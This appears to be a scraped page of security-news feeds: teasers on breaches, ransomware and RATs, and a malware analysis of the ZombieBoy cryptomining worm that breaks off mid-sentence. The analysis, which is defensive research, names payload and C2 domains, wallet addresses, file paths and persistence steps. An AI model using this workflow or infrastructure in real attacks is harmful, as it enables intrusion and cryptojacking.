Threat News Ledger

News, opinion, advice and research on computer security threats from Sophos

CarePartners said its forensic investigation identified 1500 affected records - the hackers say they took 80,000.

Roblox was moving some older, user-generated games to a newer, more secure system when the attack took place, it says.

The Independent Inquiry into Child Sexual Abuse sent out a mass emailing in which a staffer mistakenly used "To" instead of "Bcc".

Catch up with Day 4 of our Security SOS Week - here's the fourth episode of our week-long online security summit.

To its fans, Venmo is a hassle-free P2P app that lets anyone living in the US send money to friends, split a restaurant bill, pay for a ride on Uber, or buy a hotel room. To the security conscious, it's a privacy nightmare.

This could mean the end of free Android. In the meantime, Google plans to appeal.

Catch up with Day 3 of our Security SOS Week - here's the third episode of our week-long online security summit.

The scammers automatically created iOS accounts with valid email accounts, then automatically used stolen cards to buy and resell stuff.

SemanticLock replaces passwords, PINs and patterns with a sequence of graphical icons which work semantically.

Luminosity RAT sold for as little as $39.99 and could spy, steal passwords, mine cryptocurrency, and launch DDoSes.

Online headquarters of Kaspersky Lab security experts.

According to KSN, Kaspersky Lab solutions blocked 796,806,112 attacks launched from online resources located in 194 countries across the globe.

In January, we uncovered a sophisticated mobile implant Skygofree that provides attackers with remote control of infected Android devices. Network worm OlympicDestroyer attacked on the Olympic infrastructure just before the opening of the games in February.

This article discusses our project that involved searching for vulnerabilities in implementations of the OPC UA protocol. We hope to draw the attention of vendors that develop software for industrial automation systems and the industrial IoT to problems associated with using such widely available technologies.

In late April 2018, a new zero-day vulnerability for Internet Explorer (IE) was found using our sandbox; more than two years since the last in the wild example (CVE-2016-0189). This particular vulnerability and subsequent exploit are interesting for many reasons.

In April 2018, we spotted the first ransomware employing the Process Doppelgänging technique – SynAck ransomware. It should be noted that SynAck is not new, but a recently discovered sample caught our attention after it was found to be using Process Doppelgänging. Here we present the results of our investigation of this new SynAck variant.

ZooPark is a cyberespionage operation that has been focusing on Middle Eastern targets since at least June 2015. The threat actors behind the operation infect Android devices using several generations of malware, with the attackers including new features in each iteration.

In Q1 2018, we observed a significant increase in both the total number and duration of DDoS attacks against Q4 2017. The new Linux-based botnets Darkai (a Mirai clone) and AESDDoS are largely responsible for this hike.

This report by Kaspersky Lab ICS CERT presents information on identified servers that have been infected and used by the Energetic Bear/Crouching Yeti group. The report also includes the findings of an analysis of several webservers compromised by the group during 2016 and in early 2017.

In late 2017, information appeared on specialized resources about a Telegram ICO to finance the launch of its own blockchain platform. The lack of information provided fertile ground for scammers: the rumors prompted mailshots seemingly from official representatives of the platform, inviting people to take part in the ICO and purchase tokens.

We found that because of third-party SDKs many popular apps are exposing user data to the internet, with advertising SDKs usually to blame. They collect user data so they can show relevant ads, but often fail to protect that data when sending it to their servers.

Read, think, share … Security is everyone's responsibility

Security experts from Kaspersky Lab have discovered a precursor of the infamous Proton macOS malware that was named Calisto. Malware researchers from Kaspersky Lab have discovered a malware, tracked as Calisto, that appears to be to the precursor of the Proton macOS malware. “We recently came across one such sample: a macOS backdoor that we named Calisto. The […] The post Experts discovered Calisto macOS Trojan, the member of Proton RAT family appeared first on Security Affairs.

F5 experts observed a spike in the attacks in the days prior to the Trump-Putin meeting on July 16 that was held in Helsinki, Finland. Important events represent an element of attraction for cyber attacks, in June we discussed the Trump-Kim summit and the way Singapore that held it was hit by an unprecedented number of attacks […] The post Trump-Putin Meeting was the root cause of a spike of cyber attacks against Finland appeared first on Security Affairs.

SingHealth, the largest healthcare group in Singapore, suffered a massive data breach that exposed 1.5 Million patient records. The largest healthcare group in Singapore, SingHealth, has suffered a massive data breach that exposed personal information of 1.5 million patients who visited the clinics of the company between May 2015 and July 2018. Stolen records include […] The post SingHealth, largest healthcare group in Singapore, suffered a massive data breach appeared first on Security Affairs.

The popular Anarchy botmaster builds a botnet of 18,000 Huawei routers in a few hours, and it is also planning to target vulnerable Realtek routers. NewSky Security first reported the born a new huge botnet, in just one day the botmaster compromised more than 18,000 Huawei routers. NewSky security researcher Ankit Anubhav announced that the […] The post Anarchy botmaster builds a botnet of 18,000 Huawei routers in a few hours appeared first on Security Affairs.

Positive Technologies discovered two flaws affecting Dongguan Diqee 360 smart vacuums that can be used to perform video surveillance. Security researchers from Positive Technologies have discovered two vulnerabilities affecting Dongguan Diqee 360 smart vacuum cleaners that could be exploited by an attacker to run malicious code on a device with superuser privileges. The flaws likely affect smart vacuum cleaners […] The post Experts disclose dangerous flaws in robotic Dongguan Diqee 360 smart vacuums appeared first on Security Affairs.

The cybersecurity firm Group-IB is involved in the incident response on an attack on the Russian PIR Bank conducted by MoneyTaker hacking group. MoneyTaker hacker group has stolen 1 million US dollars from the Russian bank, the cyber heist occurred on July 3 through the Russian Central Bank’s Automated Workstation Client (an interbank fund transfer system similar […] The post MoneyTaker hacking group stole 1 million US dollars from Russian PIR Bank appeared first on Security Affairs.

Microsoft helped the US Government is protecting at least three 2018 midterm election candidates from attacks of Russian cyberspies. Microsoft revealed that Russian cyberspies attempted to hack at least three 2018 midterm election candidates and it has helped the US government to repeal their attacks. A Microsoft executive speaking at the Aspen Security Forum revealed the hacking attempts against […] The post Microsoft uncovered and stopped attempts to launch spear-phishing attacks on three 2018 congressional candidates appeared first on Security Affairs.

British Airways canceled flights at Heathrow due to an ‘IT system issue,’ the incident occurred on Wednesday and affected thousands of passengers. The problem had severe repercussions on the air traffic, many passengers also had their flights delayed. “On one of the busiest days of the summer, British Airways cancelled dozens of flights to and from Heathrow, […] The post ‘IT system issue’ caused cancellation of British Airways cancelled flights at Heathrow appeared first on Security Affairs.

Thousands of account credentials associated with the popular file storage service Mega have been published online, The former NSA hacker Patrick Wardle, co-founder at Digita Security, discovered in June a text file containing over 15,500 usernames, passwords, and files names. 😢 Found file on VirusTotal w/ 15K+ Mega accounts (user names/passwords & users' file listings) 😥🤬 […] The post Thousands of Mega account credentials leaked online, it is credential stuffing appeared first on Security Affairs.

Cisco has found over a dozen critical and high severity vulnerabilities in its Policy Suite, SD-WAN, WebEx and Nexus products. The tech giant has reported customers four critical vulnerabilities affecting the Policy Suite. The flaws tracked as CVE-2018-0374, CVE-2018-0375, CVE-2018-0376, and CVE-2018-0377 have been discovered during internal testing. Two of these flaws could be exploited by a remote unauthenticated attacker to access […] The post Cisco fixes critical and high severity flaws in Policy Suite and SD-WAN products appeared first on Security Affairs.

News, views, and insight from the ESET security community

Federal agency issues Notices of Violation to Datablocks and Sunlight Media for allegedly facilitating the installation of malware through online advertising The post Canada tackles malicious online advertising appeared first on WeLiveSecurity

Tech giant has 90 days to comply with ruling or faces further penalties over ‘anti-competitive’ practices The post Google slapped with €4.34bn fine by EU over antitrust violations appeared first on WeLiveSecurity

Thousands of British Airways passengers left stranded at Heathrow airport following incident The post British Airways cancelled flights at Heathrow after ‘IT system issue’ appeared first on WeLiveSecurity

ESET researchers have analyzed remote access tools cybercriminals have been using in an ongoing espionage campaign to systematically spy on Ukrainian government institutions and exfiltrate data from their systems The post A deep dive down the Vermin RAThole appeared first on WeLiveSecurity

Gary Davis accused of working as an administrator for the notorious dark web marketplace appears in a federal court in New York The post Irishman extradited to the US to face charges relating to Silk Road appeared first on WeLiveSecurity

Social media giant fined in the UK for failing to protect users’ personal information and for a lack of transparency The post Facebook fined over data privacy scandal appeared first on WeLiveSecurity

Law enforcement and malware research join forces to take down cybercriminals The post Trends 2018: Doing time for cybercrime appeared first on WeLiveSecurity

Website altered to serve a malware-tainted version of otherwise legitimate software with the global event in Russia acting as a smokescreen The post Ammyy Admin compromised with malware again; World Cup used as cover appeared first on WeLiveSecurity

Reminiscent of the recent controversy surrounding the fitness-tracking app Strava, the tale involving Polar Flow shows how the sharing of seemingly innocuous – but potentially telltale – data can have significant privacy implications The post Polar Flow app exposes geolocation data of soldiers and secret agents appeared first on WeLiveSecurity

D-Link and Changing Information Technologies code-signing certificates stolen and abused by highly skilled cyberespionage group focused on East Asia, particularly Taiwan The post Certificates stolen from Taiwanese tech-companies misused in Plead malware campaign appeared first on WeLiveSecurity

The attack, called "Thermanator", could use your body heat against you in order to steal your credentials or any other short string of text that you have typed on a computer keyboard The post Attackers could use heat traces left on keyboard to steal passwords appeared first on WeLiveSecurity

Recommendations for pentesters looking for security flaws in iOS applications made by developers The post Five tips for pentesters in iOS appeared first on WeLiveSecurity

You’ve set up an out-of-office auto-responder and packed your stuff, but have you done all of your “homework” before you rush out the front door for that well-deserved time off? The post Going on vacation? Five things to do before you leave appeared first on WeLiveSecurity

Her Majesty's Revenue & Customs (HMRC) is “consistently the most abused government brand”, according to the National Cyber Security Centre (NCSC) The post Britain’s tax authority reports takedown of record 20,000 fake sites appeared first on WeLiveSecurity

The principle of least privilege is a security strategy applicable to different areas, which is based on the idea of only granting those permissions that are necessary for the performance of a certain activity The post The principle of least privilege: A strategy of limiting access to what is essential appeared first on WeLiveSecurity

Profuse recounting of details from your life via social media may come at a price The post How (over)sharing on social media can trip you up appeared first on WeLiveSecurity

Social media giants announce new measures to tackle bots and abusers The post Twitter bots, disassemble appeared first on WeLiveSecurity

The football associations of countries competing at Russia 2018 are taking no chances when it comes to cyber-related issues The post World Cup squads briefed on cybersecurity best practices appeared first on WeLiveSecurity

The new wireless security protocol is poised to make hacking Wi-Fi connections a whole lot harder The post Wi-Fi security gets a boost as WPA3 standard is launched appeared first on WeLiveSecurity

Since a patch for the flaw has already been released, users are well advised to make sure that they’re running the browser’s most recent version The post Microsoft Edge bug could be exploited to spill your emails to malicious sites appeared first on WeLiveSecurity

The tale of “Bitcoin Baron” reveals a worrying picture and illustrates how easy it has become to wreak havoc on the internet The post Ham-fisted hacker gets jail time for serial DDoS attacks appeared first on WeLiveSecurity

Bithumb has claimed that $31.5 million worth of virtual coins were stolen by hackers The post South Korea’s largest cryptocurrency exchange hacked appeared first on WeLiveSecurity

Our lineup may seem heavy on the defensive side, but such is the nature of game plans for warding off a range of threats lurking in cyberspace The post 11 ‘teammates’ to help you win your own cybersecurity game appeared first on WeLiveSecurity

The arrest of a 25-year-old French man in Thailand apparently seals the fate of Rex Mundi, a hack-and-extort collective that operated since at least 2012 The post Europol and partners dismantle prolific cyber-extortion gang appeared first on WeLiveSecurity

Entirely new malware family discovered by ESET researchers The post New Telegram-abusing Android RAT discovered in the wild appeared first on WeLiveSecurity

A comprehensive list of some of the online resources available to victims, their families and friends The post Stop Cyberbullying Day: Advice for victims and witnesses appeared first on WeLiveSecurity

Adidas “prize” used as bait in attempt to lure people into biting The post Phishing anniversary: Here’s a free $50/month subscription appeared first on WeLiveSecurity

An all-star line-up to go head-to-head with malware The post World Cup dream team: ESET vs. Malware appeared first on WeLiveSecurity

Intruders also accessed 1.2 million personal data records, such as names, addresses or email addresses, in what is shaping up to be one of Britain’s biggest data breaches involving a single company The post Major breach at British retailer Dixons Carphone affects nearly six million bank cards appeared first on WeLiveSecurity

The country’s financial authorities met to establish a new cybersecurity plan following attack on the Bank of Chile The post Chile to revolutionize cybersecurity after the recent cyberattack appeared first on WeLiveSecurity

On the eve of the 2018 FIFA World Cup in Russia, we take a closer look at the possible cybersecurity risks that exist on sports-streaming websites The post World Cup watching: The common threats found when using streaming sites appeared first on WeLiveSecurity

The report also identifies goals that are intended to help mitigate risks associated with botnets and to increase the resilience of the internet ecosystem The post US government report highlights gaps in battle against botnets appeared first on WeLiveSecurity

La Liga says that the functionality requires the user’s express consent and that it is only intended to detect unauthorized broadcasts of soccer games The post Spain’s La Liga app uses fans’ phones to detect illegal soccer broadcasts appeared first on WeLiveSecurity

The international effort to disrupt Business Email Compromise (BEC) schemes also resulted in the seizure of nearly $2.4 million and the recovery of around $14 million in fraudulent wire transfers The post 74 people arrested in US-led crackdown on email scams appeared first on WeLiveSecurity

Tricksters have been misleading users about the functionality of apps by displaying bogus download numbers The post Android users: Beware these popularity-faking tricks on Google Play appeared first on WeLiveSecurity

The security implications of devices connecting and sharing data The post Interred in the Internet of Everything appeared first on WeLiveSecurity

The city has spent $5 million to restore files, rebuild impacted systems, and harden its cyber-defenses The post Atlanta’s ransomware attack: Police dashcam video archives lost forever appeared first on WeLiveSecurity

Hunting for secrets from high-profile targets while staying in the shadows The post InvisiMole: Surprisingly equipped spyware, undercover since 2013 appeared first on WeLiveSecurity

New research into VPNFilter finds more devices hit by malware that’s nastier than first thought, making rebooting and remediating of routers more urgent. The post VPNFilter update: More bad news for routers appeared first on WeLiveSecurity

With the 2018 FIFA World Cup in Russia just days away, fraudsters are increasingly using all things soccer as bait to reel in unsuspecting fans so that they get more than they bargained for The post You have NOT won! A look at fake FIFA World Cup-themed lotteries and giveaways appeared first on WeLiveSecurity

Thanks to everyone who reads us and voted for us! The post WeLiveSecurity named Best Corporate Security Blog! appeared first on WeLiveSecurity

Following the massive cyberattack on banks in Mexico, we consider what can cybersecurity can do to help the industry The post The cyberattack on banks in Mexico: The challenges posed to cybersecurity appeared first on WeLiveSecurity

The FBI say yes but should you follow this advice? And if you do follow it, do you know how to do so safely? The post Router reboot: How to, why to, and what not to do appeared first on WeLiveSecurity

The scam circulated through WhatsApp aimed at users in Brazil claiming that Nike will give away the jersey that the team will wear at FIFA World Cup Russia 2018. The post False contest to win jersey of the Brazilian team found on WhatsApp appeared first on WeLiveSecurity

Whether travelling to enjoy the matches in person, or watching from home, fans should be on the lookout for foul play The post World Cup scams: How to avoid an own goal appeared first on WeLiveSecurity

Embedded within the agency’s European Cybercrime Centre (EC3), the new team will also work together with law enforcement globally in an effort to reduce the size of the underground illegal economy The post Europol sets up EU-wide team to fight dark web crime appeared first on WeLiveSecurity

How we can help protect a generation for which digital is the way of the world? The post More curious, less cautious: Protecting kids online appeared first on WeLiveSecurity

Security researchers have demonstrated how attackers could cause physical damage to hard drives, and cause PCs to crash, just by playing sounds through a computer's speaker. The post An acoustic attack can bluescreen your Windows computer appeared first on WeLiveSecurity

Healthcare sectors, critical manufacturing, food production and transportation also said to be targets for cybercriminals The post Trends 2018: Critical infrastructure attacks on the rise appeared first on WeLiveSecurity

So far in 2018, the NGO has launched two charity campaigns with the aim of raising funds through cryptocurrency mining. The post UNICEF now using cryptocurrency mining for fundraising appeared first on WeLiveSecurity

Protect Your Interwebs!

The US Federal Bureau of Investigation (FBI) just released a public service announcement (PSA) to the public about a large number of websites being exploited and compromised through WordPress plugin vulnerabilities: Continuous Web site defacements are being perpetrated by individuals sympathetic to the Islamic State in the Levant (ISIL) a.k.a. Islamic State of Iraq andRead More

Security Risk: Dangerous Exploitation level: Very Easy/Remote DREAD Score: 8/10 Vulnerability: Persistent XSS Patched Version:  1.4.4 During a routine audit for our Website Firewall (WAF), we discovered a dangerous Persistent XSS vulnerability affecting the very popular WP-Super-Cache plugin (more than a million active installs according to wordpress.org). The security issue, as well as another bug-fixRead More

Last year, we released a post about a malware injector found in an Adobe Flash (.SWF) file. In that post, we showed how a .SWF file is used to inject an invisible, malicious iFrame. It appears that the author of that Flash malware continued with this method of infection. Now we are seeing more varietiesRead More

Have you ever heard of the term PCI? Specifically, PCI compliance? If you have an e-commerce website, you probably have already heard about it. But do you really understand what it means for you and your online business? In this series, we will try to explain the PCI standard and how it affects you andRead More

Darkleech is a nasty malware infection that infects web servers at the root level. It use malicious Apache modules to add hidden iFrames to certain responses. It’s difficult to detect because the malware is only active when both server and site admins are not logged in, and the iFrame is only injected once a dayRead More

I joined Sucuri a little over a month ago. My job is actually as a Social Media Specialist, but we have this process where regardless of your job you have to learn what website infections look like and more importantly, how to clean them. It’s this idea that regardless of you are you must alwaysRead More

Today, with the proliferation of open-source technologies like WordPress, Joomla! and other Content Management Systems (CMS) people around the world are able to quickly establish a virtual presence with little to no cost. In the process however, a lot is being lost in terms of what it means to own a website. We are failingRead More

The last 7 days have been very busy with a number of vulnerabilities being disclosed on multiple WordPress plugins. Some of them are minor issues, some are more relevant, while others are what we’d categorize as noise. How are you supposed to make sense of all this? To help provide some clarity on the influxRead More

Trojan (or trojan horse) is software that does (or pretends to be doing) something useful but also contains a secret malicious payload that inconspicuously does something bad. In WordPress, typical trojans are plugins and themes (usually pirated) which may have backdoors, or send out spam, create doorways, inject hidden links or malware. The trojan modelRead More

Security Risk: Critical Exploitation level: Very Easy/Remote DREAD Score: 9/10 Vulnerability: Password bypass / Privilege Escalation Patched Version:  2.0.9.2 During a routine audit of our Website Firewall (WAF), we found a critical vulnerability affecting the popular MainWP Child WordPress plugin. According to worpdress.org, it is installed on more than 90,000 WordPress sites as as remote administrationRead More

Emerging threats and malware research

We’ve been tracking some more spam dropping Zepto ransomware variants. Like earlier posts, we’re seeing infected attachments with malicious macro scripts used as the entry point for the threat actor. (See images below of some recent spam samples.) As we dig deeper into our analysis, we found out that these macro scripts are not crafted […] The post Zepto Evasion Techniques appeared first on ThreatTrack Security Labs Blog.

Recently, we’ve spotted Zepto ransomware spreading through spam email containing fake invoices (see image below). These attachments contain a Macro-Enabled word document file known as Donoff, which downloads the Zepto executable that encrypts all your files and will later ask for payment of the decryption key. We decided to take a closer look on the Donoff […] The post Donoff Macro Dropping Ransomware appeared first on ThreatTrack Security Labs Blog.

ThreatTrack Labs has recently observed a surge of spam containing a zip attachment with a WSF (Windows Scripting File) to deliver Zepto ransomware. This tactic is a change from the common JavaScript and macro documents being spammed previously. Here are actual emails featuring familiar social engineering tactics: The zip attachments contain the WSF.   An Interactive […] The post Zepto Ransomware Packed into WSF Spam appeared first on ThreatTrack Security Labs Blog.

Reports of a Zero-day attack affecting numerous Office 365 users emerged late last month (hat tip to the researchers at Avanan), and the culprit was a new variant of the Cerber ransomware discovered earlier this year. As with the other Zero-day threats that have been popping-up like mushrooms of late, the main methods of infection […] The post A Look at the Cerber Office 365 Ransomware appeared first on ThreatTrack Security Labs Blog.

TeslaCrypt is yet another ransomware taking the cyber world by storm. It is mostly distributed via a spear phishing email and through the Angler exploit kit. The Angler exploits vulnerability in Adobe Flash. The Angler exploit downloads a variant of the ransomware upon success. TeslaCrypt 3.0 possesses various updates, one of which renders encrypted files […] The post A Close Look at TeslaCrypt 3.0 Ransomware appeared first on ThreatTrack Security Labs Blog.

It’s been the norm in the cybersecurity industry to be intrigued and at the same time be infuriated by the people behind any successful large-scale malware attack. Ransomware is one such example. It’s been slowly released in the wild since the early 2009, but CryptoWall redefined the meaning of ransomware and took it to the […] The post The Day the Earth Stood Still for CryptoWall appeared first on ThreatTrack Security Labs Blog.

It is one of the most prevalent spam malware in the wild today: Locky ransomware. The Locky malware authors started their campaign last year but didn’t become very active until January 2016 – and they haven’t slowed down since. Locky e-mails usually come in with an attached zip archive and once extracted may contain a […] The post Understanding the Latest Version of Locky Ransomware appeared first on ThreatTrack Security Labs Blog.

Ransomware has become an increasingly serious threat. Cryptowall, TeslasCrypt and Locky are just some of the ransomware variants that infected large numbers of victims. Petya is the newest strain and the most devious among them. Petya will not only encrypt files but it will make the system completely useless, leaving the victim no choice but […] The post A Glimpse at Petya Ransomware appeared first on ThreatTrack Security Labs Blog.

Security researchers recently discovered that the power outage in the Ukraine in December was caused by a malware and identified as an evolved version of BlackEnergy. This Trojan, dating back to 2007, was a popular malware that was previously sold in Russian underground sites. However, its design and architecture changed from performing simple HTTP DDos attacks to […] The post Breaking Down the Malware Behind the Ukraine Power Outage appeared first on ThreatTrack Security Labs Blog.

Credit: Christopher D. Del Fierro, Lead Malware Research Engineer, ThreatTrack Security We have seen Dridex since 2014 and it is still active in the wild today. This research will be focusing on analyzing Dridex and on how it is able to remain undetected by most antivirus engines. For those not familiar with Dridex, it is a malspam […] The post What’s New with Dridex appeared first on ThreatTrack Security Labs Blog.

The most recent posts from across the AlienVault blogs.

INFOSEC RECRUITING - IS THE INDUSTRY CREATING ITS OWN DROUGHT We've all been blasted with many a report that infosec has a massive skills gap. But what if the problem doesn't lie with the lack of skilled professionals, but the hiring process itself? Thomas Fischer makes a compelling argument, using some of his personal recent experiences from both sides of the hiring process. InfoSec Recruiting – Is the Industry Creating its own Drought? | Liquid Matrix GDPR Did you think that discussions around GDPR were over? You thought wrong. Want to avoid GDPR fines? Adjust your IT Procurement methods | HelpNetSecurity SEXTORTION SCAMS A clever new twist on an on extortion email scam includes a password the recipient previously used at a hacked website, to lend credence to claims that the sender has hacked the recipients computer / webcam and recorded embarrassing videos. Sextortion Scam Uses Recipient’s Hacked Passwords | Krebs on Security TESLA Elon Musk continues to make the headlines, sometimes for the right, and other times for the wrong reasons. But it's worth taking a look at the companies security. While there was the infamous emaila few weeks back where Musk pointed the finger of blame to a rogue employee, it's not the first case of cybersecurity gone wrong in the company. Tesla sued an oil-industry executive for impersonating Musk in an email. The tricksters goal was to undermine tesla's energy-efficient transportation. Here’s why Tesla has been sabotaged twice in two years — lax network security | Last Watchdog RELATED OLDER NEWS Tesla responds to Chinese hack with a major security upgrade | Wired Elon Musk’s top cybersecurity concern: Preventing a fleet-wide hack of Teslas | CSO online So is Tesla more a car company or a software company that happens to make cars? THOUSANDS OF MEGA LOGINS DUMPED ONLINE Thousands of credentials for accounts associated with New Zealand-based file storage service Mega have been published online. The text file contains over 15,500 usernames, passwords, and files names, indicating that each account had been improperly accessed and file names scraped. Thousands of Mega logins dumped online, exposing user files | ZDNet Somewhat related, the NY Times has rolled out a new feature to secure subscriber accounts that locks accounts whose passwords have appeared in breaches. Introducing Lock & Key: A New Measure to Secure Subscriber Accounts | NY Times WE'VE HAD A DATA BREACH... LET'S NOT TELL ANYONE It’s a basic question in the face of a data breach: do we fix it and keep quiet? Or do we tell the world and risk the consequences. A major fuel company was recently confronted by this challenge, and their response and how they communicated it provides a worrying lesson for issue and crisis managers everywhere. We’ve had a data breach… let’s not tell anyone | Mumbrella DEMYSTIFYING THE PUBLIC OR PRIVATE CLOUD CHOICE Everyone wants to operate like a tech company today. Chances are, your business can’t thrive without improving how you do IT, and executives must decide where to house and process their data. Companies like Liberty Mutual are able to enter a new market in just six months and double the average sales rate, while government organizations are defying expectations with rapidly developed and deployed applications across the board from tax collection to war-fighting. Your cloud strategy is going to be nuanced. A recent Forrester study found that just four percent of organizations run their applications exclusively in the public cloud; 77 percent of organizations are using multiple types of clouds, both on-premises and off-premises. So do you go the public or private cloud route? It can be a complicated question. Let’s look at some starting considerations. Demystifying the Public or Private Cloud Choice | Built to adapt RANDOMNESS A few other stories I enjoyed reading recently. The Industry Analyst Evaluation Game | Field thoughts How not to be an analyst | IIAR Health Insurers Are Vacuuming Up Details About You — And It Could Raise Your Rates | ProPublica The SIM Hijackers | Motherboard APT1 - what happened next? | Countercept       

This is a guest post by independent security researcher James Quinn. Continuing the 2018 trend of cryptomining malware, I’ve found another family of mining malware similar to the “massminer” discovered in early May.  I’m calling this family ZombieBoy since it uses a tool called ZombieBoyTools to drop the first dll. ZombieBoy, like MassMiner, is a cryptomining worm that uses some exploits to spread. However, unlike MassMiner, ZombieBoy uses WinEggDrop instead of MassScan to search for new hosts. ZombieBoy is being continually updated, and I’ve been obtaining new samples almost daily. An overview of ZombieBoy’s execution is below: Domains ZombieBoy uses several servers running HFS (http file server) in order to acquire payloads.  The URLs that I have identified are below: ca[dot]posthash[dot]org:443/ sm[dot]posthash[dot]org:443/ sm[dot]hashnice[dot]org:443/ In addition, it appears to have a C2 server at dns[dot]posthash[dot]org. Exploits ZombieBoy makes use of several exploits during execution: CVE-2017-9073, RDP vulnerability on Windows XP and Windows Server 2003 CVE-2017-0143, SMB exploit CVE-2017-0146, SMB exploit Installation ZombieBoy first uses the EternalBlue/DoublePulsar exploits to remotely install the main dll. The program used to install the 2 exploits is called ZombieBoyTools and appears to be of chinese origin. It uses Chinese simplified as its language, and has been used to deploy a number of Chinese malware families (such as the IRONTIGER APT version of Gh0stRAT) .  ZombieBoyTools screenshot Once the DoublePulsar exploit is successfully executed, it loads and executes the first Dll of the malware. This downloads 123.exe from ca[dot]posthash[dot]org:443, saves it to “C:\%WindowsDirectory%\sys.exe”, and then executes it. Set up 123.exe does several things on execution.  First, it downloads the module [1] from its file distribution servers.  According to code analysis of 123.exe, it refers to this module as “64.exe”, but saves it to the victim as “boy.exe”.   After saving the module, it executes it.  64.exe appears to be in charge of distributing ZombieBoy as well as holding the XMRIG miner. In addition to downloading a module from its servers, 123.exe also drops and executes 2 modules.  The first module is referred to in the code as “74.exe”.  This is saved as “C:\Program Files(x86)\svchost.exe. This appears to be a form of the age-old Gh0stRAT.  The second module is referred to in the code as “84.exe”.  This is saved as “C:\Program Files(x86)\StormII\mssta.exe” and appears to be a RAT of unknown origin. 64.exe 64.exe is the first module downloaded by ZombieBoy. 64.exe uses some anti-analysis techniques that are quite formidable.  First, the entire executable is encrypted with the packer Themida, making reverse-engineering difficult.  Also, in current versions of ZombieBoy, it will detect a VM and subsequently not run.  64.exe drops 70+ files into C:\Windows\IIS that consists of the XMRIG miner, the exploits, as well as a copy of itself that it names CPUInfo.exe.  64.exe obtains the ip of the victim by connecting to ip[dot]3222[dot]net.  It then uses WinEggDrop, a lightweight TCP scanner to scan the network to find more targets with port 445 open.  It uses the IP obtained above as well as the local IP to spread to the local network as well as the public ip netrange 64.exe uses the DoublePulsar exploit to install both a SMB backdoor as well as an RDP backdoor. DoublePulsar screenshot In addition, 64.exe uses XMRIG to mine for XMR.  Prior to shutting down one of its addresses on minexmr.com, ZombieBoy was mining at around 43KH/s. This would earn the attackers slightly over $1,000 per month at current Monero prices. A new address has been found, however, ZombieBoy no longer uses minexmr.com to mine. Known Addresses: 42MiUXx8i49AskDATdAfkUGuBqjCL7oU1g7TsU3XCJg9Maac1mEEdQ2X9vAKqu1pvkFQUuZn2HEzaa5UaUkMMfJHU5N8UCw 49vZGV8x3bed3TiAZmNG9zHFXytGz45tJZ3g84rpYtw78J2UQQaCiH6SkozGKHyTV2Lkd7GtsMjurZkk8B9wKJ2uCAKdMLQ Using strace, I found that 64.exe was obtaining information about the victim, such as enumerating the OS architecture. 74.exe 74.exe is the first module dropped by 123.exe, and the second module overall.  In its base form, 74.exe is in charge of downloading, decrypting, and executing a Gh0stRat dll named NetSyst96.dll.  In addition, 74.exe decrypts a series of arguments to be passed to Netsyst96.dll.  The arguments are as follows: Dns.posthash.org 127.0.0.1 5742944442 YP_70608 ANqiki cmsuucs Aamqcygqqeqkia Fngzxzygdgkywoyvkxlpv ldv %ProgramFiles%/ Svchost.exe Add Eeie saswuk wso Decryption Screenshot Once 74.exe has decrypted the arguments, it checks if NetSyst96.dll has been downloaded and saved to C:\Program Files\AppPatch\mysqld.dll.  It does this by calling CreateFileA with the CreationDisposition set to Open_Existing.  If mysqld.dll is not found, 74.exe opens a connection to ca[dot]posthash[dot]org:443/ and downloads NetSyst96.dll, saving it as C:\Program Files\AppPatch\mysqld.dll. NetSyst96.dll has 2 exported functions, DllFuUpgraddrs, and DllFuUpgraddrs1.  After saving NetSyst96.dll as mysqld.dll, 74.exe locates DllFuUpgraddrs in NetSyst96.dll before calling it. NetSyst96.dll NetSyst96.dll is the called dll of 74.exe.  Typically encrypted, an analysis of the decrypted files returns some interesting strings which can be used to identify it, such as “Game Over Good Luck By Wind”, “jingtisanmenxiachuanxiao.vbs”. Strings screenshot showing some of the dropped files NetSyst96.dll can capture the users screen, record audio, and even edit the clipboard.  Also, a strings analysis revealed that it imports keyboard keys, typical of a keylogger.  First, Netsyst96.dll obtains the Environment Strings path and uses that to create the path C:\Program files (x86)\svchost.exe. Next, using CreateToolhelp32Snapshot, NetSyst96.dll searches the running processes for Rundll32.exe in order to determine if it is the first time running the dll.  For first time run throughs, NetSyst96.dll does a couple things to maintain persistence Saves a copy of 74.exe as C:\Program Files(x86)\svchost.exe Registers “ANqiki cmsuucs” as a service using System/CurrentControlSet/Services/ANqiki cmsuucs When the service is launched, runs svchost.exe Adds MARKTIME to the registry key, appending the time it was last launched. Use a snapshot from CreateToolhelp32Snapshot to search the running processes for svchost.exe If not found, launch it and loop back to searching for svchost.exe If one is found, Save svchost.exe to Run If more than one is found, Call a function to create a vbs script to delete the extra svchost.exe On Consecutive Run throughs, NetSyst96.dll is more concerned with connecting to the C2 server: Locate and verify that “System/CurrentControlSet/Services/ANqiki cmsuucs” exists If it doesn’t exist, create the key like above If it does exist, continue on to step 2 Create event named “Eeie saswuk wso” Enumerate and change the input desktop Pass the C2 server Ip to C2URL (dns[dot]posthash[dot]org) Start WSA (winsock 2.0) Connect to www[dot]ip123[dot]com[dot]cn and obtain the ip of dns[dot]posthash[dot]org The actual IP is subject to change, however, it currently is 211.23.47[dot]186 Reset Event Connect to C2 Server and await commands While the command that triggers this function is unknown, I did uncover a 31 option switch-case that seems to be the command options for NetSyst96.dll.  See the Appendix for more indepth analysis of some of the 31 options. 84.exe 84.exe is the second module dropped by 123.exe, and the third module overall.  Just like 74.exe, it appears to be a RAT.  However, that is where the similarities stop.  Unlike 74.exe, 84.exe does not need to download any additional libraries and instead decrypts and executes Loader.dll from its own memory.  In addition, 84.exe uses a function to decrypt Loader.dll that involves throwing exceptions for every character that needs to be decrypted.  Additional run through information: Sets the user’s environment strings to C:\Program Files(x86)\StormII\ In addition, once Loader.dll is called, 84.exe passes a series of variables to Loader.dll through a function called ‘Update’ Variables ChDz0PYP8/oOBfMO0A/0B6Y= 0 6gkIBfkS+qY= dazsks fsdgsdf daac gssosjwayw |_+f+ fc45f7f71b30bd66462135d34f3b6c66 EQr8/KY= C:\Program Files(x86)\StormII Mssta.exe 0 Ccfcdaa Various integers Of the strings passed to Loader.dll, 3 are encrypted.  The decrypted strings are as follows [ChDz0PYP8/oOBfMO0A/0B6Y=] = "dns[dot]posthash[dot]org" [6gkIBfkS+qY=] = "Default" [EQr8/KY=] = "mdzz" Loader.dll Loader.dll is a RAT with some interesting features, like the ability to search for the CPU write speed, as well as search the system for antiviruses. Launched by 84.exe, the first thing Loader.dll does is obtain the variables from ‘Update’ in 84.exe.  At this point, Loader.dll creates several important runtime objects: Uninheritable, non-signaled, auto-reset event named Null, handle: 0x84 Thread to execute a function that manipulates DesktopInfo An input 